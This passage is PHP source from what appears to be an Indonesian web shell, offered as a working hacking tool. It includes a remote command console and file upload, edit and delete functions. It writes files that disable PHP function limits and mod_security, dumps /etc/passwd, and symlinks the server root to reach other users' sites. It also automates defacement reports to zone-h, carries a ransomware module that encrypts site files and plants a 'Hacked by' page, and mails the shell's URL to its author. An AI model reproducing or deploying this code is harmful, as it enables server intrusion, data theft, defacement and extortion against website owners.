$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}echo '</td></tr><tr><td><br>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '<font color="#73FF00">Upload Berhasil</font><br />';
}else{
echo '<font color="red">Upload Gagal</font><br/>';
}
}
echo '<form enctype="multipart/form-data" method="POST">
<font color="white">File Upload :</font> <input type="file" name="file" style="font-family:Kelly Slab;font-size:15;background:blue;color:gold;border:2px solid red;"/>
<input type="submit" value="Upload" style="margin-top:4px;height:27px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:gold;border:2px solid red;border-radius:5px"/>
</form>
</td></tr>';
if(isset($_GET['filesrc'])){
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo '</tr></td></table><br>';
echo('<br><pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}
elseif($_GET['do'] == 'bypass'){
echo "<center>";
echo "<form method=post><input type=submit name=ini value='php.ini' /> <input type=submit name=htce value='.htaccess' /><br><br></form>";
if(isset($_POST['ini']))
{
$file = fopen("php.ini","w");
echo fwrite($file,"disable_functions=none
safe_mode = Off
");
fclose($file);
echo "<a href='php.ini'>click here!</a>";
} if(isset($_POST['htce']))
{
$file = fopen(".htaccess","w");
echo fwrite($file,"<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
");
fclose($file);
echo "htaccess successfully created!";
}
echo"</center>";
}
elseif($_GET['do'] == 'adminer') {
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
function adminer($url, $isi) {
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if(file_exists('adminer.php')) {
echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
} else {
if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
} else {
echo "<center><font color=red>gagal buat file adminer</font></center>";
}
}
}
elseif($_GET['do'] == 'hash') {
$submit = $_POST['enter'];
if (isset($submit)) {
$pass = $_POST['password']; // password
$salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
$hash = md5($pass); // md5 hash #1
}
echo '<center><form action="" method="post"><b> ';
echo '<center><h2><b>-=[ PASSWORD HASH]=-</b></h2></center></tr>';
echo ' <center><b>password yang mau dihash:</b> ';
echo ' <input class="inputz" type="text" name="password" size="40" />';
echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
echo ' <br><br><br>';
echo ' Hasil Hash</th><br><br></center></tr>';
echo ' Password Original <input class=inputz type=text size=50 value=' . $pass . '> <br><br>';
echo ' MD5 <input class=inputz type=text size=50 value=' . $hash . '> <br><br>';
if ($_POST['awkuser']) {
echo"<textarea class='inputzbut' cols='65' rows='15'>";
echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
echo "</textarea><br>";
}
if ($_POST['systuser']) {
echo"<textarea class='inputzbut' cols='65' rows='15'>";
echo system("ls /var/mail");
echo "</textarea><br>";
}
if ($_POST['passthuser']) {
echo"<textarea class='inputzbut' cols='65' rows='15'>";
echo passthru("ls /var/mail");
echo "</textarea><br>";
}
if ($_POST['exuser']) {
echo"<textarea class='inputzbut' cols='65' rows='15'>";
echo exec("ls /var/mail");
echo "</textarea><br>";
}
if ($_POST['shexuser']) {
echo"<textarea class='inputzbut' cols='65' rows='15'>";
echo shell_exec("ls /var/mail");
echo "</textarea><br>";
}
if($_POST['syst'])
{
echo"<textarea class='inputz' cols='65' rows='15'>";
echo system("cat /etc/passwd");
echo"</textarea><br><br><b></b><br>";
}
if($_POST['passth'])
{
echo"<textarea class='inputz' cols='65' rows='15'>";
echo passthru("cat /etc/passwd");
echo"</textarea><br><br><b></b><br>";
}
if($_POST['ex'])
{
echo"<textarea class='inputz' cols='65' rows='15'>";
echo exec("cat /etc/passwd");
echo"</textarea><br><br><b></b><br>";
}
if($_POST['shex'])
{
echo"<textarea class='inputz' cols='65' rows='15'>";
echo shell_exec("cat /etc/passwd");
echo"</textarea><br><br><b></b><br>";
}
echo '<center>';
if($_POST['melex'])
{
echo"<textarea class='inputz' cols='65' rows='15'>";
for($uid=0;$uid<60000;$uid++){
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "\n";
}
}
echo"</textarea><br><br>";
}
//
//
}
elseif($_GET['votr'] == 'cmd') {
echo "<center><form method='post'>
<font style='text-decoration: underline;'>".get_current_user
()."@".$_SERVER['SERVER_ADDR'].": ~ $ </font>
<input type='text' size='30' height='10' name='cmd'><input
type='submit' name='do_cmd' value='>>'>
</form></center>";
if($_POST['do_cmd']) {
echo "<pre>".exe($_POST['cmd'])."</pre>";
}
}
?>
<?php
if($_GET['do'] == 'jumping') {
$i = 0;
echo "<pre><div class='margin: 5px auto;'>";
$etc = fopen("/etc/passwd", "r");
while($passwd = fgets($etc)) {
if($passwd == '' || !$etc) {
echo "<font color=red>Can't read /etc/passwd</font>";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
foreach($user_jumping[1] as $user_ctt_jump) {
$user_jumping_dir = "/home/$user_ctt_jump/public_html";
if(is_readable($user_jumping_dir)) {
$i++;
$jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
if(is_writable($user_jumping_dir)) {
$jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
}
echo $jrw;
if(function_exists('posix_getpwuid')) {
$domain_jump = file_get_contents("/etc/named.conf");
if($domain_jump == '') {
echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
foreach($domains_jump[1] as $dj) {
$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_jumping_url = $user_jumping_url['name'];
if($user_jumping_url == $user_ctt_jump) {
echo " => ( <u>$dj</u> )<br>";
break;
}
}
}
} else {
echo "<br>";
}
}
}
}
}
if($i == 0) {
} else {
echo "<br>Total ".$i." domain di ".gethostbyname($_SERVER['HTTP_HOST'])."";
}
echo "</div></pre>";
} ?>
<center>
<?php
if($_GET['votr'] == 'sym') {
@set_time_limit(0);
echo " <div style='width:100%; height:auto;' align='center'>
";
@mkdir('sym',0777);
$htaccess = "Options all \n DirectoryIndex Sux.html \n AddType
text/plain .php \n AddHandler server-parsed .php \n AddType text/plain
.html \n AddHandler txt .html \n Require None \n Satisfy Any";
$write =@fopen ('sym/.htaccess','w');
fwrite($write ,$htaccess);
@symlink('/','sym/root');
$filelocation = basename(__FILE__);
$read_named_conf = @file('/etc/named.conf');
if(!$read_named_conf)
{
echo "gak bisa di akses [ /etc/named.conf ] </pre></center>";
}
else
{
echo "<br><br><center><div class='tmp'><table border='1' bordercolor='#00ff00'
width='500' cellpadding='1'
cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td></center>";
foreach($read_named_conf as $subject){
if(eregi('zone',$subject)){
preg_match_all('#zone "(.*)"#',$subject,$string);
flush();
if(strlen(trim($string[1][0])) >2){
$UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
$name = $UID['name'] ;
@symlink('/','sym/root');
$name = $string[1][0];
$iran = '\.ir';
$israel = '\.il';
$indo = '\.id';
$sg12 = '\.sg';
$edu = '\.edu';
$gov = '\.gov';
$gose = '\.go';
$gober = '\.gob';
$mil1 = '\.mil';
$mil2 = '\.mi';
$malay = '\.my';
$china = '\.cn';
$japan = '\.jp';
$austr = '\.au';
$porn = '\.xxx';
$as = '\.uk';
$calfn = '\.ca';
if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or
eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi
("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or
eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])
or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or
eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0])
or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi
("$calfn",$string[1][0]))
{
$name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red;
'>".$string[1][0].'</div>';
}
echo "
<tr>
<td>
<div class='dom'><a target='_blank' href=http://www.".$string[1]
[0].'/>'.$name.' </a> </div>
</td>
<td>
'.$UID['name']."
</td>
<td>
<a href='sym/root/home/".$UID['name']."/public_html'
target='_blank'>Symlink </a>
</td>
</tr></div> ";
flush();
}
}
}
}
echo "</center></table></div>";
}
?></center>
<?php
if($_GET['do'] == 'zoneh') {
if($_POST['submit']) {
$domain = explode("\r\n", $_POST['url']);
$nick = $_POST['nick'];
echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
function zoneh($url,$nick) {
$ch = curl_init("http://www.zone-h.com/notify/single");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
return curl_exec($ch);
curl_close($ch);
}
foreach($domain as $url) {
$zoneh = zoneh($url,$nick);
if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
echo "$url --> <font color=lime>OK</font><br><br>";
} else {
echo "$url --> <font color=red>ERROR</font><br><br>";
}
}
} else {
echo "<center><form method='post'>
<u>Defacer</u>: <br>
<input type='text' name='nick' size='50' value='./Fake Root'><br>
<u>Domains</u>: <br>
<textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
<input type='submit' name='submit' value='Submit' style='width: 450px;'>
</form>";
}}
?>
<?php
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '-1');
if($_GET['do'] == 'ransom') {
class deRanSomeware
{
public function shcpackInstall(){
if(!file_exists(".htaencrypted")){
rename(".htaccess", ".htaencrypted");
if(fwrite(fopen('.htaccess', 'w'), "#Cracker Ransomware\r\n DirectoryIndex x.htm\r\n ErrorDocument 404 /x.htm")){
echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>';
}
if(file_put_contents("x.htm", base64_decode("PCFkb2N0eXBlIGh0bWw+IDxodG1sIGxhbmc9ImVuIj4gPGhlYWQ+IDx0aXRsZT5IYWNrZWQgYnkgMU5EMFRSMEo0TiBYPC90aXRsZT4gPCEtLSBSZXF1aXJlZCBtZXRhIHRhZ3MgLS0+IDxtZXRhIG5hbWU9ImtleXdvcmRzIiBjb250ZW50PSJIYWNrZWQgYnkgMU5EMFRSMEo0TiBYIj4gPG1ldGEgY2hhcnNldD0idXRmLTgiPiA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTAuNzUsIHNocmluay10by1maXQ9bm8iPiA8bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0iWyBTb2xvIFBsYXllciBOZXZlciBEaWUgXSI+IDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iaHR0cHM6Ly9zdGFja3BhdGguYm9vdHN0cmFwY2RuLmNvbS9ib290c3RyYXAvNC4xLjMvY3NzL2Jvb3RzdHJhcC5taW4uY3NzIiBpbnRlZ3JpdHk9InNoYTM4NC1NQ3c5OC9TRm5HRThmSlQzR1h3RU9uZ3NWN1p0MjdOWEZvYW9BcG1ZbTgxaXVYb1BrRk9Kd0o4RVJka25MUE1PIiBjcm9zc29yaWdpbj0iYW5vbnltb3VzIj4gPGxpbmsgaHJlZj0iaHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3M/ZmFtaWx5PU1hbGk6NDAwaSw3MDBpIiByZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIj4gPGxpbmsgcmVsPSJpY29uIiBocmVmPSIiaHR0cHM6Ly9qLnRvcDR0b3AuaW8vcF8xNjg5cGliZzQwLmpwZyB0eXBlPSJpbWFnZS9qcGciPiA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vdXNlLmZvbnRhd2Vzb21lLmNvbS9yZWxlYXNlcy92NS43LjEvY3NzL2FsbC5jc3MiIGludGVncml0eT0ic2hhMzg0LWZubU9DcWJUbFdJbGo4THlUam83bU9VU3Rqc0tDNHBPcFFicXlpN1JyaE43dWRpOVJ3aEtrTUhwdkxiSEc5U3IiIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiPiA8c2NyaXB0IHNyYz0iaHR0cDovL2UtbWV0ZS5jb20vanMva2Rzbm93LmpzIiB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPjwvc2NyaXB0PiAgPHN0eWxlPiBodG1sLGJvZHksLmNvbnRhaW5lcnsgYmFja2dyb3VuZDp1cmwoaHR0cHM6Ly9pLmltZ3VyLmNvbS9pR1gxeEFwLmpwZykgbm8tcmVwZWF0IGNlbnRlciBjZW50ZXIvY292ZXI7IHBvc2l0aW9uOiBmaXhlZDsgbWFyZ2luOiBhdXRvOyBoZWlnaHQ6IDEwMCU7IHRvcDogMDsgYm90dG9tOiAwOyBsZWZ0OiAwOyByaWdodDowOyB9IC5wYWdleyBwb3NpdGlvbjogYWJzb2x1dGU7IG1hcmdpbjogYXV0bzsgaGVpZ2h0OiA1MCU7IHRvcDogMDsgYm90dG9tOiAwOyBsZWZ0OiAwOyByaWdodDowOyB9IC5tZWt7IGJhY2tncm91bmQtY29sb3I6cmdiYSgwLDAsMCwwLjQpOyB9IGgxeyB0cmFuc2Zvcm06cm90YXRlKC0xMmRlZyk7IC1tb3otdHJhbnNmb3JtOnJvdGF0ZSgtMTJkZWcpOyAtd2Via2l0LXRyYW5zZm9ybTpyb3RhdGUoLTEyZGVnKTsgLW8tdHJhbnNmb3JtOnJvdGF0ZSgtMTJkZWcpOyBmb250LWZhbWlseTogIk1hbGkiOyBmb250LXNpemU6IDJlbTsgZm9udC13ZWlnaHQ6IGJvbGQ7IG1hcmdpbi1ib3R0b206IDE1JTsgfSBoNXsgZm9udC1mYW1pbHk6ICJNYWxpIjsgfSAubG9nb3sgdGV4dC1kZWNvcmF0aW9uOiBub25lOyBjb2xvcjogd2hpdGU7IGZvbnQtc2l6ZTogMjJweDsgbWFyZ2luOiAxMHB4OyB9IC5sb2dvOmhvdmVyeyB0ZXh0LWRlY29yYXRpb246IG5vbmU7IGNvbG9yOiB3aGl0ZTsgY3Vyc29yOiBwb2ludGVyOyB9IC5oYXN0YWd7IHRleHQtZGVjb3JhdGlvbjogbm9uZTsgY29sb3I6IHdoaXRlOyB9IDwvc3R5bGU+IDwvaGVhZD4gPHNjcmlwdD5hbGVydCgiSGFja2VkIGJ5IDFORDBUUjBKNE4gWCIpPC9zY3JpcHQ+IDxib2R5PiAJPGlmcmFtZSB3aWR0aD0iMCIgaGVpZ2h0PSIwIiBzcmM9Imh0dHBzOi8vai50b3A0dG9wLmlvL3BfMTY4OXBpYmc0MC5qcGciIGZyYW1lYm9yZGVyPSIwIiBhbGxvd2Z1bGxzY3JlZW4+PC9pZnJhbWU+IDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+IDxkaXYgY2xhc3M9InBhZ2UiPiA8aDEgY2xhc3M9InRleHQtY2VudGVyIHRleHQtd2hpdGUiPi0gSGFja2VkIGJ5IDFORDBUUjBKNE4gWCAtPC9oMT4gPGRpdiBjbGFzcz0ibWVrIj4gPGg1IGNsYXNzPSJ0ZXh0LWNlbnRlciB0ZXh0LXdoaXRlIG1iLTMiPjxocj7igJxZb3UgV2lsbCBTZWUgVGhlIFBvd2VyIE9mIEluZG9uZXNpYW4gTmF0aW9u4oCdPGJyPjxkaXYgY2xhc3M9Im1layI+IDxoNSBjbGFzcz0idGV4dC1jZW50ZXIgdGV4dC13aGl0ZSBtYi0zIj48aHI+I0luZG9uZXNpYW5fSGFja2VyX1J1bGV6PGJyPkNvcHlyaWdodCAxTkQwVFIwSjROIFggMjAxODxocj48L2g1PiA8L2Rpdj48L2Zvb3Rlcj48aHI+IDxkaXYgY2xhc3M9Im1layI+IDxoNSBjbGFzcz0idGV4dC1jZW50ZXIgdGV4dC13aGl0ZSBtYi0zIj48aHI+PGNlbnRlcj4gT2ZmaWNpYWwgTWVtYmVyIDo8YnI+LTp8PG1hcnF1ZWUgd2lkdGg9IjUwJSI+PC9mb250Pjxmb250IGNsYXNzPSJ0ZXh0LWNlbnRlciB0ZXh0LXdoaXRlIG1iLTMiIGNvbG9yPSJ3aGl0ZSIgc2l6ZT0iMyI+TmFza2FsZW5nNDUgLSBKZW5kcmFsOTIgLSBYSnVuZzI3MjI8L2ZvbnQ+PC9tYXJxdWVlPnw9LTwvY2VudGVyPiA8L2Rpdj4gPC9ib2R5PiA8L2h0bWw+"))){
echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> x.htm (Default Page)<br>';
}
}
}
public function shcpackUnstall(){
if( file_exists(".htaencrypted") ){
if( unlink(".htaccess") && unlink("x.htm") ){
echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> .htaccess (Default Page)<br>';
echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> x.htm (Default Page)<br>';
}
rename(".htaencrypted", ".htaccess");
}
}
public function plus(){
flush();
ob_flush();
}
public function locate(){
return getcwd();
}
public function shcdirs($dir,$method,$key){
switch ($method) {
case '1':
deRanSomeware::shcpackInstall();
break;
case '2':
deRanSomeware::shcpackUnstall();
break;
}
foreach(scandir($dir) as $d)
{
if($d!='.' && $d!='..')
{
$locate = $dir.DIRECTORY_SEPARATOR.$d;
if(!is_dir($locate)){
if( deRanSomeware::kecuali($locate,"x.htm") && deRanSomeware::kecuali($locate,".png") && deRanSomeware::kecuali($locate,".jpg") && deRanSomeware::kecuali($locate,".up.php") && deRanSomeware::kecuali($locate,".PNG") && deRanSomeware::kecuali($locate,".gif") && deRanSomeware::kecuali($locate,".GIF") && deRanSomeware::kecuali($locate,".jpeg") && deRanSomeware::kecuali($locate,"prep.php") && deRanSomeware::kecuali($locate,".htaccess") ){
switch ($method) {
case '1':
deRanSomeware::shcEnCry($key,$locate);
deRanSomeware::shcEnDesDirS($locate,"1");
break;
case '2':
deRanSomeware::shcDeCry($key,$locate);
deRanSomeware::shcEnDesDirS($locate,"2");
break;
}
}
}else{
deRanSomeware::shcdirs($locate,$method,$key);
}
}
deRanSomeware::plus();
}
}
public function shcEnDesDirS($locate,$method){
switch ($method) {
case '1':
rename($locate, $locate.".encrypted");
break;
case '2':
$locates = str_replace(".encrypted", "", $locate);
rename($locate, $locates);
break;
}
}
public function shcEnCry($key,$locate){
$data = file_get_contents($locate);
$iv = mcrypt_create_iv(
mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),
MCRYPT_DEV_URANDOM
);
$encrypted = base64_encode(
$iv .
mcrypt_encrypt(
MCRYPT_RIJNDAEL_128,
hash('sha256', $key, true),
$data,
MCRYPT_MODE_CBC,
$iv
)
);
if(file_put_contents($locate, $encrypted )){
echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4"> ~Locked</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
}else{
echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4"> ~Locked</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> '.$locate.' <br>';
}
}
public function shcDeCry($key,$locate){
$data = base64_decode( file_get_contents($locate) );
$iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
$decrypted = rtrim(
mcrypt_decrypt(
MCRYPT_RIJNDAEL_128,
hash('sha256', $key, true),
substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),
MCRYPT_MODE_CBC,
$iv
),
"\0"
);
if(file_put_contents($locate, $decrypted )){
echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B"> ~Unlock</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
}else{
echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B"> ~ Unlock</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
}
}
public function kecuali($ext,$name){
$re = "/({$name})/";
preg_match($re, $ext, $matches);
if($matches[1]){
return false;
}
return true;
}
}
if($_POST['submit']){
switch ($_POST['method']) {
case '1':
deRanSomeware::shcdirs(deRanSomeware::locate(),"1",$_POST['key']);
break;
case '2':
deRanSomeware::shcdirs(deRanSomeware::locate(),"2",$_POST['key']);
break;
}
}else{
?>
<center>
<img src="http://www.homelandsecureit.com/wp-content/uploads/2011/01/security-padlock.gif" height="50px" width="50px">
CREATE RANSOMWARE<br><br>
<form action="" method="post" style=" text-align: center;">
<select name="method" class="selecte" style="width:130px;">
<option value="1"><b>ENCRYPT</b></option>
<option value="2"><b>DECRYPT</b></option>
</select>
<input type="submit" name="submit" class="submite" value="Submit" style="width:100px;"/>
</div>
</form>
</center>
<?php
}}?>
<?php
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'fikriofficial4676@gmail.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "ACCESS", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
?>
<?php
if(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '</table><br><center><br><br />';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '<font color="yellow">Change Permission Berhasil</font><br/>';
}else{
echo '<font color="red">Change Permission Gagal</font><br />';
}
}
echo '<br><form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="UBAH" />
</form>';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '<font color="yellow">Ganti Nama Berhasil</font><br/>';
}else{
echo '<font color="red">Ganti Nama Gagal</font><br />';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="UBAH" />
</form>';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '<font color="yellow">Berhasil Edit File</font><br/>';
}else{
echo '<font color="red">Gagal Edit File</font><br/>';
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Save" />
</form>';
}
echo '</center>';
}else{
echo '</table><br/><center>';
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<font color="yellow">Directory Terhapus</font><br/>';
}else{
echo '<font color="red">Directory Gagal Terhapus </font><br/>';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '<font color="yellow">File Terhapus</font><br/>';
}else{
echo '<font color="red">File Gagal Dihapus</font><br/>';
}
}
}
echo '</center>';
$scandir = scandir($path);
echo '<div id="content"><table width="100%" border="2" style="border-color:#8B4513;" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>NAME</center></td>
<td><center>SIZE</center></td>
<td><center>PERMISSION</center></td>
<td><center>ACTION</center></td>
</tr>';
foreach($scandir as $dir){
if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
echo '<tr>
<td><img src="data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs="><a href="?path='.$path.'/'.$dir.'"> '.$dir.'</a></td>
<td><center>--</center></td>
<td><center>';
if(is_writable($path.'/'.$dir)) echo '<font color="#C4FF00">';
elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
echo perms($path.'/'.$dir);
if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
echo '</center></td>
<td><center><form method="POST" action="?option&path='.$path.'">
<select name="opt" style="margin-top:6px;width:120px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">
<option value="">SELECT</option>
<option value="delete">DELETE</option>
<option value="chmod">CHMOD</option>
<option value="rename">RENAME</option>
</select>
<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="'.$dir.'">
<input type="hidden" name="path" value="'.$path.'/'.$dir.'">
<input type="submit" value="GO" style="margin-top:6px;width:27px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">
</form></center></td>
</tr>';
}
echo '<tr class="first"></tr>';
foreach($scandir as $file){
if(!is_file($path.'/'.$file)) continue;
$size = filesize($path.'/'.$file)/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}
echo '<tr>
<td><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII="><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'"> '.$file.'</a></td>
<td><center>'.$size.'</center></td>
<td><center>';
if(is_writable($path.'/'.$file)) echo '<font color="#C4FF00">';
elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
echo perms($path.'/'.$file);
if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
echo '</center></td>
<td><center><form method="POST" action="?option&path='.$path.'">
<select name="opt" style="margin-top:6px;width:120px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">
<option value="">SELECT</option>
<option value="delete">DELETE</option>
<option value="chmod">CHMOD</option>
<option value="rename">RENAME</option>
